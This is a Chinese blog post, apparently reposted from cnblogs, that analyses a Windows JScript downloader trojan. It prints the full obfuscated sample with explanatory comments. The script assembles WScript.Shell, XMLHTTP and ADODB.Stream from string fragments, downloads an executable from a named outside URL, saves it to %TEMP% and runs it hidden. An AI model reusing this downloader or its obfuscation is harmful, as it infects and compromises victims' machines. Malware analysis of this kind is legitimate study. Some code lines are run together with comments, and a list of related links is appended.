windows本地script脚本恶意代码分析(带注释)
2024-05-12 15:01:10
//经过样本分析和抓取,该恶意程序是款下载者木马。
//不懂的可以百度百科。
http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK
var uKcZJmztw = "f";
var VLjBZijBRDIxir = "sd";
var mzHiDfbVgtzWL = "uhi";
var XrxesgIWQ = "ya";
var STgtocEaUgS = "f";
var Mccq = "gsd";
var YVFRNFKC = "a7o";
var zokYxgifSUOsDIn = "d8f";
var rysGOQRkJ = "hgs";
var fAJEpxv = "7";
var LzK = "u";
var WnKggbYjhbgaYK = "dfa";
var RQJm = "s";
var tcbpCSVm = "o";
var glYioNGTMO = "a";
var cMleB = "fkj";
var guMAPaymgfr = ";l";
var aWosZJAl = "d";
var rrruwakBVMdHT = "s";
var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf//---------------------------------
var wxGM = "f";
var wME = "sd";
var WYl = "hi";
var DgXr = "yau";
var OFbjPAVgdUDSr = "sdf";
var AKaUjBxV = "g";
var YWyNEBKTCAr = "a7o";
var UmkNXPoXKvV = "8f";
var jrUTHQOJCXz = "d";
var VMrAuxWTPKwLZbj = "hgs";
var hnAKwB = "au7";
var kuRwVoQ = "f";
var OXjw = "d";
var wSaGYFaTjPu = "aos";
var UdT = "j";
var wGKytuRmi = "k";
var FwSAu = ";lf";
var uSsmxvh = "d";
var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf
---------------------------------
var fvJysePITGsZ = "f";
var MJLm = "sd";
var OHdTWUSWyLDnD = "hi";
var NfkoHHanka = "au";
var pAJLp = "fy";
var xTeQe = "d";
var wolngRcKPNjI = "s";
var Ctd0 = "og";
var NGJpEc = "a7";
var johMrZhTBT = "f";
var rWRr = "d8";
var xhuyvlXNtG = "gs";
var AoFEsd = "7h";
var IarTKEg = "fau";
var UiCusNVVRYpV = "osd";
var SqXtHDCTAOoEfv = "ja";
var kSXJa = "k";
var AzMZQADlr = ";lf";
var OFZC = "sd";
var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf
//-----------------------------------
var wiM = "ose";
var cdzFN = "l";
var gtVOEyZRPMBkY = "c";//close();
//-----------------------------------
var FKqYCuGSVDKEk = "e";
var yLdfoNQSLG = "Fil";
var Kegv = "o";
var REweUeFfsfzCC = "veT";
var mCxYdwKmDTeZ = "Sa";//savetofile();
//-----------------------------------
var orFCagIxftilPY = "on";
var AnB = "iti";
var OeuDh = "pos";//position
//-----------------------------------
var bxwfUYaplk = "e";
var ZHBIenDJhvi = "t";
var OmwNrBIs = "wri";//write()
//-----------------------------------
var IonAXHdnbsJsHYL = "e";
var svvPS = "typ";//type
//-----------------------------------
var RxDykD = "n";
var ftsB = "ope";//open
//-----------------------------------
var zZoO = "am";
var TSCSrKWiKQY = "tre";
var AIfn = "B.S";
var zbAsfUmIk = "D";
var uWdDgxvOZcUG = "O";
var MUSaOvH = "D";
var YZVOwlzLPfausz = "A";//"adodb.stream"
//-----------------------------------
var pNGkr = "ct";
var iqPSquxJgp = "je";
var bTJnufjW = "b";
var lIexL = "teO";
var kZBJ = "rea";
var derqHNng = "C";//creatobject("adodb.stream") var LiTxpjAMHxAgUQ = "4h4";
var WWzPWldMX = "6n";
var CuF0 = "k6j";
var oUHbKSEqhF = "0";
var lQP = "hu/";
var RQUOidonsf = "l.";
var NjKvurbzu = "ta";
var CSyCCMfj = "por";
var XcTxpkvH = "egy";
var aUucLqfydBnSn = "j";
var lTXzk = "ev";
var mpAARoVfxvEsej = ".n";
var NVJeSNhziHjX = "www";
var JFDhyk = "://";
var CFpmRSiBsMp = "p";
var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4
//-----------------------------------
var uBtUfBIHbmz = "T";
var LwKK = "GE";// get
//-----------------------------------
var KRPXN = "pen";
var HrNtkpOuBMYa = "o";//open
//-----------------------------------
var OFdMpJOyw = "e";
var NlpqQU = "x";
var cZpOdxEyvqRfb = "7.e";
var cLfbaiuobq = "PO";
var XmXyEnhbtWhG = "M1";
var DQZEGAm = "ko";
var cKoUGmrGJtE = "SE";
var QasyJ = "Ky";//KySEKoM1PO7.exe
//-----------------------------------
var eQyCEVqQUazI = "%/";
var tNgKCALxxEpJMf = "P";
var mNYqbv = "M";
var FrwlCZOPjcmJvoE = "E";
var KyNfXZkSc = "%T";//%TEMP%/
//-----------------------------------
var AjbjrFWcHO = "gs";
var RyW = "in";
var LVlachWJa = "Str";
var NGjUy = "t";
var ZXMail = "n";
var XLaaPawDhGaz = "e";
var lRTf = "m";
var EGxwfaNKp = "ron";
var UCOpd = "vi";
var xZQvOWiNMG = "n";
var NLgbSPQIDLAIj = "ndE";
var Gyo = "xpa";
var gPYeoLnn = "E";//expendenvironmentstrings
//-----------------------------------var kpsxpufDRzihIGv = "TP";
var vGOfgZZdOVh = "T";
var wJOAaSUgz = "LH";
var bPhWMdYs = "XM";
var AwpqZN = "2.";
var RNVidTrApbBfHO = "XML";
var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp
//-----------------------------------
var zkeMzwunlwoMdUD = "n";
var oVQABSTeJWqKG = "Ru";
var WkRVEzGFpaMCAC = "ell";
var AoJg = "h";
var HDveUfs = "S";
var PGItzPyn = ".";
var iTVqHxcrEbduDt = "t";
var wxGWFQyhW = "rip";
var KDSFP = "c";
var nzV = "WS";//wscript.shell.run()
//-----------------------------------
var NFFhujLOFwsUs = "ct";
var kvZBOvoVgLSEG = "je";
var DXP = "b";
var zjRmzjunjFUys = "O";
var EcDMPFvaxG = "e";
var stMA = "at";
var KnALPhmOVixZ = "Cre";//createobject()
//-----------------------------------var aCTc = new Date();
var SZT0 = aCTc.getMilliseconds();
WScript.Sleep(10);var aCTc = new Date();
var bRDtyPAQicD = aCTc.getMilliseconds();
WScript.Sleep(10);var aCTc = new Date();
var VrU = aCTc.getMilliseconds();
WScript.Sleep(10);var aCTc = new Date();
var DEyWdL = aCTc.getMilliseconds();//
var NdNAj = bRDtyPAQicD - SZT0;
//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();
//
// 10s
var HRORMjJ = VrU - bRDtyPAQicD;// 10s
var YSc0 = DEyWdL - VrU;// 10sWshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);
//wshShell=wscript[createobject](wscript.shell.run);function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}//function jmljvNFWjSplH(NLN)
//{
// WshShell[run](NLN,0,0);
//}function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}//function OcEOsFHpWS(n)
//{
// return MSxml2.xmlhttp;
//}if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;//fOikDMmzwkAuGlw=/%temp%/ path
//WshShell[expendedenvironmentstrings](%temp%);EFASPqJ = OcEOsFHpWS(0);//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);
//
//xmlhttp object//[HrNtkpOuBMYa + KRPXN]==open wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);//xmlhttp.open("get","url",false);wMRqfsrlJdPwT.send();while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};//readystateelcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);//var adoStream=createobject("adodb.stream");elcHu[HrNtkpOuBMYa + KRPXN]();//adoStream.open();elcHu[svvPS + IonAXHdnbsJsHYL] = 1;//adoStream.type=1;elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);//adoStream.write(wMRqfsrlJdPwT.ResponseBody);elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;//adoStream.position=0;elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );//adoStream.savetofile(/%temp%/,2);elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();//adoStream.close();
//jmljvNFWjSplH("/%temp%/");//WshShell[run](NLN,0,0)NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;//10sHRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();//10sYSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;//10s}
转载于:https://www.cnblogs.com/microzone/p/5445511.html
windows本地script脚本恶意代码分析(带注释)相关推荐
- 基于windows PE文件的恶意代码分析;使用SystemInternal工具与内核调试器研究windows用户空间与内核空间...
基于windows PE文件的恶意代码分析:使用SystemInternal工具与内核调试器研究windows用户空间与内核空间 ******************** 既然本篇的主角是PE文件,那 ...
- 2017-2018-2 20155228 《网络对抗技术》 实验四:恶意代码分析
2017-2018-2 20155228 <网络对抗技术> 实验四:恶意代码分析 1. 实践内容 1.1 系统运行监控 使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部 ...
- 2018-2019-2 20165330《网络对抗技术》Exp4 恶意代码分析
目录 基础问题 相关知识 实验目的 实验内容 实验步骤 实验过程中遇到的问题 实验总结与体会 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意软件,就分析Exp2或Exp3中 ...
- Exp4 恶意代码分析 20164303 景圣
Exp4 恶意代码分析 实验内容 实验点一:系统运行监控 (1)使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里.运行一段时间并分析该文件,综述一下分析结果.目标就是找出 ...
- 2018-2019-2 20165114《网络对抗技术》Exp4 恶意代码分析
Exp4 恶意代码分析 目录 一.实验目标 (1)监控你自己系统的运行状态,看有没有可疑的程序在运行. (2)分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sys ...
- 2018-2019-2 网络对抗技术 20165227 Exp4 恶意代码分析
2018-2019-2 网络对抗技术 20165227 Exp4 恶意代码分析 实验步骤: 使用的设备:Win7(虚拟机).kali(虚拟机) 实验一:使用如计划任务,每隔一分钟记录自己的电脑有哪些程 ...
- 20155301 Exp4 恶意代码分析
20155301 Exp4 恶意代码分析 实践目标 (1) 是监控你自己系统的运行状态,看有没有可疑的程序在运行. (2) 是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用 ...
- 【恶意代码分析】_第一站
文章目录 概述 基本概念 有损压缩 加壳 壳的装载及其分类 压缩器和保护器 恶意程序在线分析网站 UPX实验 介绍UPX 使用UPX压缩文件 UPX加壳原理 使用工具查看和脱壳 Lord PE 工具P ...
- 网安--第七章 恶意代码分析与防治
第7章 恶意代码分析与防治 内容提要 ◎ 恶意代码的发展史和恶意代码长期存在的原因 ◎ 恶意代码实现机理.定义以及攻击方法 ◎ 恶意代码生存技术.隐藏技术,介绍网络蠕虫的定义以及结构 ◎ 恶意代码防范 ...
- 恶意代码分析——基础技术篇
文章目录 恶意代码分析目的 恶意代码分析方法 恶意代码种类 恶意代码静态分析 环境 在线反病毒引擎 获取哈希值(certutil-hanshfile path MD5) 查找字符串hive strin ...
最新文章
- 员工拒绝加班,被判赔公司1.8万!网友炸锅
- 戈登贝尔奖获得者张林峰:当AI遇上物理模型,会有怎样的质变? | 智源专访...
- 37.递推:Pell数列
- 速卖通新手入驻必须了解的“9大知识点”
- Linux环境下安装OpenOffice 4.1.8
- Qwt(一): 编译 · 安装
- LeetCode 2 Keys Keyboard
- android studio设置生成的release版本apk的名称
- 部署基于tomcat 8 的solrCloud 5.5集群
- SOA系列文章(二):服务设计原理:服务模式和反模式
- 项目回顾-PopupWindow
- Container 布局容器
- echarts环形图
- 零基础学习.NET平台和Csharp编程开发
- Python-字典遍历
- 医视云助力清华长庚医院开展肝胆外科肿瘤远程多学科会诊
- 常用计算机病毒防治办法,常见的计算机病毒防治措施有哪些
- 几种欧姆龙PLC型号的辨识
- 迁移学习癌医学影像检测
- 【图像去噪】基于小波变换(中值、硬阙值、软阙值)的图像去噪含Matlab源码
热门文章
- qpushbutton设置两个图标_苹果手机的月亮图标有什么功能?原来这么好用,不会真的太浪费了...
- 蓄电池单格电压多少伏_直流屏蓄电池电压的常见问题小结
- java int integer_浅谈java中int和Integer的区别
- matmul torch 详解_python基础教程详解torch.Tensor的4种乘法
- edp协议 netty_EdpProtoDebugger-EdpProtoDebugger(EDP协议调试分析工具)下载 v2.0官方版--pc6下载站...
- DL_C1_week_2_2(Logistic Regression)
- TensorFlow by Google 实战CNN Machine Learning Foundations: Ep #4 - Coding with CNN
- 机器学习- 吴恩达Andrew Ng - week3-1 Classification
- idea中tomcat不能发布html,idea中Tomcat无法启动成功
- 188.买卖股票的最佳时机IV